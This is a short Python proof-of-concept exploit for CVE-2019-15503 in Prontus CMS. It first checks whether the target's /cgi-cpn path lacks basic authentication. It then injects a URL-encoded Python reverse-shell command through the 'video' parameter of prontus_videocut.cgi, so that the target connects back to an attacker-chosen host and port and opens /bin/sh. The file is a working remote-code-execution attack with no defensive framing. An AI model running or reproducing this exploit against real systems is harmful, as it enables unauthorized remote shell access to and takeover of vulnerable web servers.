#!/usr/bin/python3 # CVE-2019-15503 # isra import argparse import requests def exec_rce(host, prontus_id, rhost, rport): # check first if /cgi-cpn is basic auth protected url_cgi = "{}/cgi-cpn".format(host) print("[*] Checking if basic auth is enabled.") req = requests.get(url_cgi) if(req.status_code == 401): print("[*] Basic auth enabled. Aborting...") return print("[*] Basic auth disabled!") print("[*] Building RCE...") # build reverse shell cmd = "/usr/bin/python -c 'import socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p%3Dsubprocess.call([\"/bin/sh\",\"-i\"]);'".format(rhost, rport) url_rce = "{}/cgi-cpn/xcoding/prontus_videocut.cgi?prontus_id={}&t1=1&t2=2&video=;{};/12345678/mmedia/multimedia_videoA123456.mpeg".format(host, prontus_id, cmd) print("[*] sending shell oOoOoOoOoOoOoO!!!") # send req = requests.get(url_rce) def main(): parser = argparse.ArgumentParser() parser.add_argument("host", help="target host (e.g. http://foo.bar)") parser.add_argument("prontus", help="target prontus ID (e.g. prontus_cms)") parser.add_argument("rhost", help="host for reverse shell") parser.add_argument("rport", help="port for reverse shell") args = parser.parse_args() if(not args.host or not args.prontus or not args.rhost or not args.rport): print("Missing arguments. Try '{} --help' for more information.".format(__file__)) else: print("#"*80) print("\n\t ~=== Prontus CMS RCE PoC ===~") print("\t+ target host: {}".format(args.host)) print("\t+ prontus ID: {}".format(args.prontus)) print("\t+ reverse shell to {}:{}\n".format(args.rhost, args.rport)) exec_rce(args.host, args.prontus, args.rhost, args.rport) print("#"*80) if __name__ == '__main__': main()